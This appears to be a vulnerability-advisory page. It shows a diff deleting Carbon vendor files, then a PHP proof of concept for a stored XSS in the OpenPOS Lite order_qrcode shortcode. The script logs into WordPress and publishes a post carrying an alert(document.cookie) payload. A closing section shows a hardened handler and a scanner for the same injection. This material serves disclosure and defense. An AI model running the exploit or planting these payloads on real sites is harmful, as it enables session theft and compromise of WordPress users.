-     *
-     * @return array
-     */
-    public function __debugInfo()
-    {
-        return [
-            'locale' => $this->getLocale(),
-        ];
-    }
-
-    private static function compareChunkLists($referenceChunks, $chunks)
-    {
-        $score = 0;
-
-        foreach ($referenceChunks as $index => $chunk) {
-            if (!isset($chunks[$index])) {
-                $score++;
-
-                continue;
-            }
-
-            if (strtolower($chunks[$index]) === strtolower($chunk)) {
-                $score += 10;
-            }
-        }
-
-        return $score;
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/src/Carbon/Carbon.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/src/Carbon/Carbon.php
@@ -1,523 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace Carbon;
-
-use CarbonTraitsDate;
-use CarbonTraitsDeprecatedProperties;
-use DateTime;
-use DateTimeInterface;
-use DateTimeZone;
-
-/**
- * A simple API extension for DateTime.
- *
- * @mixin DeprecatedProperties
- *
- * <autodoc generated by `composer phpdoc`>
- *
- * @property      int                 $year
- * @property      int                 $yearIso
- * @property      int                 $month
- * @property      int                 $day
- * @property      int                 $hour
- * @property      int                 $minute
- * @property      int                 $second
- * @property      int                 $micro
- * @property      int                 $microsecond
- * @property      int|float|string    $timestamp                                                                                      seconds since the Unix Epoch
- * @property      string              $englishDayOfWeek                                                                               the day of week in English
- * @property      string              $shortEnglishDayOfWeek                                                                          the abbreviated day of week in English
- * @property      string              $englishMonth                                                                                   the month in English
- * @property      string              $shortEnglishMonth                                                                              the abbreviated month in English
- * @property      int                 $milliseconds
- * @property      int                 $millisecond
- * @property      int                 $milli
- * @property      int                 $week                                                                                           1 through 53
- * @property      int                 $isoWeek                                                                                        1 through 53
- * @property      int                 $weekYear                                                                                       year according to week format
- * @property      int                 $isoWeekYear                                                                                    year according to ISO week format
- * @property      int                 $dayOfYear                                                                                      1 through 366
- * @property      int                 $age                                                                                            does a diffInYears() with default parameters
- * @property      int                 $offset                                                                                         the timezone offset in seconds from UTC
- * @property      int                 $offsetMinutes                                                                                  the timezone offset in minutes from UTC
- * @property      int                 $offsetHours                                                                                    the timezone offset in hours from UTC
- * @property      CarbonTimeZone      $timezone                                                                                       the current timezone
- * @property      CarbonTimeZone      $tz                                                                                             alias of $timezone
- * @property-read int                 $dayOfWeek                                                                                      0 (for Sunday) through 6 (for Saturday)
- * @property-read int                 $dayOfWeekIso                                                                                   1 (for Monday) through 7 (for Sunday)
- * @property-read int                 $weekOfYear                                                                                     ISO-8601 week number of year, weeks starting on Monday
- * @property-read int                 $daysInMonth                                                                                    number of days in the given month
- * @property-read string              $latinMeridiem                                                                                  "am"/"pm" (Ante meridiem or Post meridiem latin lowercase mark)
- * @property-read string              $latinUpperMeridiem                                                                             "AM"/"PM" (Ante meridiem or Post meridiem latin uppercase mark)
- * @property-read string              $timezoneAbbreviatedName                                                                        the current timezone abbreviated name
- * @property-read string              $tzAbbrName                                                                                     alias of $timezoneAbbreviatedName
- * @property-read string              $dayName                      
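Review bot: this hunk is cut off in the rendering at the `$dayName` property line, so only the first sixty or so of the 523 removed lines (`@@ -1,523 +0,0 @@`) are visible and the remainder of the `Carbon.php` deletion cannot be reviewed here. For the deletion series as a whole, every hunk above removes a `vendor/nesbot/carbon` file outright, so two things should accompany it: the regenerated Composer autoload files (`vendor/composer/autoload_classmap.php`, `autoload_static.php`, `autoload_psr4.php`) so no stale classmap entry points at a removed file, and a check that no `use Carbon\...` or `Carbon::` reference remains in the plugin, since a missing class only surfaces as a fatal error at request time.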

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1826 - OpenPOS Lite <= 3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
/**
 * Proof of Concept for CVE-2026-1826
 * Demonstrates stored XSS via OpenPOS Lite order_qrcode shortcode width attribute
 * Requires Contributor-level WordPress credentials
 */

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// XSS payload in width attribute - executes JavaScript alert when page loads
$malicious_shortcode = '[order_qrcode width="100px" onload="alert(document.cookie)" height="100"]';

// Create a new post with the malicious shortcode
$post_title = 'Test Post with XSS Payload';
$post_content = 'This post contains a malicious OpenPOS shortcode: ' . $malicious_shortcode;

// Initialize cURL session for WordPress authentication
$ch = curl_init();

// First, authenticate to get nonce and cookies
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);

// Check if authentication succeeded
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Authentication failed. Check credentials.');
}

// Get nonce for post creation (from admin-ajax.php or rest API)
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'rest-nonce'
]));

$response = curl_exec($ch);

// Create post via REST API
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . (preg_match('/"nonce":"([^"]+)"/', $response, $matches) ? $matches[1] : '')
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
    'title' => $post_title,
    'content' => $post_content,
    'status' => 'publish'
]));

$response = curl_exec($ch);
$result = json_decode($response, true);

if (isset($result['id'])) {
    echo "Success! Post created with ID: " . $result['id'] . "n";
    echo "Visit: " . $target_url . "/?p=" . $result['id'] . " to trigger the XSS payloadn";
    echo "The malicious shortcode will execute JavaScript when the page loads.n";
} else {
    echo "Failed to create post. Response: " . $response . "n";
}

curl_close($ch);
?>
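The root cause the advisory describes is shortcode attribute values concatenated into a style attribute without escaping. The following is an added illustration, not code from this page or from OpenPOS Lite: a simplified, hypothetical handler that reproduces that pattern, a hardened version that whitelists width and height to a plain CSS length and escapes them in attribute context, and a helper a site owner can run over stored post content to list order_qrcode shortcodes whose attributes would fail that whitelist. The function names, the qrcode.png path and the sample post body are constructed for the example; the injected value is the one quoted in the advisory.

```php
<?php
// Added illustration, not OpenPOS Lite's own code: a simplified shortcode
// handler that mirrors the pattern the advisory describes (width/height from
// $atts concatenated into a style attribute), a hardened version, and a
// helper that scans stored post content for attribute values that fail the
// same whitelist. All function names here are hypothetical.

// Vulnerable pattern: attribute values go straight into the HTML output.
function order_qrcode_unsafe(array $atts): string
{
    $width  = $atts['width']  ?? '100px';
    $height = $atts['height'] ?? '100px';
    return '<img src="qrcode.png" style="width:' . $width . ';height:' . $height . '">';
}

// Accept only a plain CSS length: a number with an optional px/em/rem/% unit.
// Semicolons, quotes, parentheses and url(...) can never pass this check.
function is_css_length(string $value): bool
{
    return preg_match('/^\d{1,4}(?:\.\d{1,2})?(?:px|em|rem|%)?$/', $value) === 1;
}

function css_length_or_default(string $value, string $default): string
{
    return is_css_length($value) ? $value : $default;
}

// Hardened pattern: validate the value, then escape it for attribute context.
// Inside WordPress the escaping call would be esc_attr() and the defaults
// would come from shortcode_atts(); htmlspecialchars() is used here so the
// file runs without WordPress loaded.
function order_qrcode_safe(array $atts): string
{
    $width  = css_length_or_default((string) ($atts['width']  ?? ''), '100px');
    $height = css_length_or_default((string) ($atts['height'] ?? ''), '100px');
    return '<img src="qrcode.png" style="width:'
        . htmlspecialchars($width, ENT_QUOTES, 'UTF-8')
        . ';height:' . htmlspecialchars($height, ENT_QUOTES, 'UTF-8') . '">';
}

// Defender-side check: list every [order_qrcode ...] occurrence whose width
// or height attribute would not survive is_css_length(). Double-quoted,
// single-quoted and unquoted attribute forms are recognised.
function find_suspicious_qrcode_shortcodes(string $post_content): array
{
    $hits = [];
    if (!preg_match_all('/\[order_qrcode\b([^\]]*)\]/i', $post_content, $tags)) {
        return $hits;
    }
    foreach ($tags[1] as $attrString) {
        preg_match_all(
            '/(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|(\S+))/',
            $attrString,
            $matches,
            PREG_SET_ORDER
        );
        foreach ($matches as $attr) {
            $name = strtolower($attr[1]);
            // Exactly one of the three value groups is non-empty for a match.
            $value = ($attr[2] ?? '') . ($attr[3] ?? '') . ($attr[4] ?? '');
            if (in_array($name, ['width', 'height'], true) && !is_css_length($value)) {
                $hits[] = ['attribute' => $name, 'value' => $value];
            }
        }
    }
    return $hits;
}

// Constructed sample attributes and post body: one benign shortcode and one
// carrying the style-injection value quoted in the advisory.
$injected    = '100px;background:url(javascript:alert(document.cookie))';
$sample_atts = ['width' => $injected, 'height' => '100'];
$sample_post = 'Scan here: [order_qrcode width="120px" height="120px"] '
    . '[order_qrcode width="' . $injected . '" height="100"]';

echo "Unsafe render: " . order_qrcode_unsafe($sample_atts) . "\n";
echo "Safe render:   " . order_qrcode_safe($sample_atts) . "\n";
print_r(find_suspicious_qrcode_shortcodes($sample_post));
```

Run with `php example.php`. The unsafe render carries the injected `background:url(...)` declaration through into the style attribute; the safe render falls back to the 100px default because the value is not a bare CSS length, and the scan reports the second shortcode's width attribute. The whitelist-then-escape order matters: escaping alone would keep the value inside the attribute but still let arbitrary CSS declarations through, which is why the hardened version validates the shape of the value first.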
